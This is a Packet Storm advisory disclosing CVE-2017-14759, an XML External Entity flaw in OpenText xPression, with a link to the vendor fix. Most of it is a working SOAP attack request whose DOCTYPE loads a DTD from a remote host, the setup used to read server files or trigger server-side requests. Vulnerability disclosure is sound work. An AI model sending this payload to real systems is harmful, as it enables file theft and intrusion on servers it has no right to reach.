OpenText Document Sciences xPression 4.5SP1 Patch 13 XML Injection

2017-09-29T00:00:00
ID PACKETSTORM:144447
Type packetstorm
Reporter Mariusz Woloszyn
Modified 2017-09-29T00:00:00

Description

                                        
                                            `Title: OpenText Document Sciences xPression (formerly EMC Document  
Sciences xPression) - XML External Entity  
Author: Marcin Woloszyn  
Date: 27. September 2017  
CVE: CVE-2017-14759  
  
Affected Software:  
==================  
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)  
  
Exploit was tested on:  
======================  
v4.5SP1 Patch 13 (older versions might be affected as well)  
  
XML External Entity:  
====================  
  
Application XML parser is accepting DOCTYPE in provided XML documents  
either directly or indirectly, using URL.  
This can be exploited in various of ways, e.g. to read directory  
listings, read system or application files,  
cause denial of service or issue requests on behalf of server (SSRF).  
  
Vector :  
--------  
  
POST /xFramework/services/QuickDoc.QuickDocHttpSoap11Endpoint/ HTTP/1.1  
Accept-Encoding: gzip,deflate  
Content-Type: text/xml;charset=UTF-8  
SOAPAction: "urn:publishDocument"  
Content-Length: 13689  
Host: [...cut...]  
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)  
Connection: close  
  
<soapenv:Envelope  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:web="http://webservice.framework.xprs.dsc.com">  
<soapenv:Header/>  
<soapenv:Body>  
<web:publishDocument>  
<web:requestContext><![CDATA[<!DOCTYPE m [ <!ENTITY % r  
SYSTEM "http://[...cut...]/m.xml"> %r; %i; %t; ]><RequestContext>  
<Credentials method="UserID and Password">  
<UserID>[...cut...]</UserID>  
<Password>[...cut...]</Password>  
</Credentials>  
<ApplicationName>ELease</ApplicationName>  
</RequestContext>]]>  
</web:requestContext>  
<web:documentName>[...cut...]</web:documentName>  
<web:customerData>  
<![CDATA[  
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xsi:noNamespaceSchemaLocation="C:\xPression\CustomerData\Schema\eLease_v0.3.xsd">  
<eLease>  
<PrintStatus>Final</PrintStatus>  
[...cut...]  
</eLease>  
</root>  
]]> </web:customerData>  
<!--Optional:-->  
<web:outputProfileName>PDF w Draftwatermark to  
File</web:outputProfileName>  
</web:publishDocument>  
</soapenv:Body>  
</soapenv:Envelope>  
  
Fix:  
====  
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774  
  
Contact:  
========  
mw[at]nme[dot]pl  
  
  
`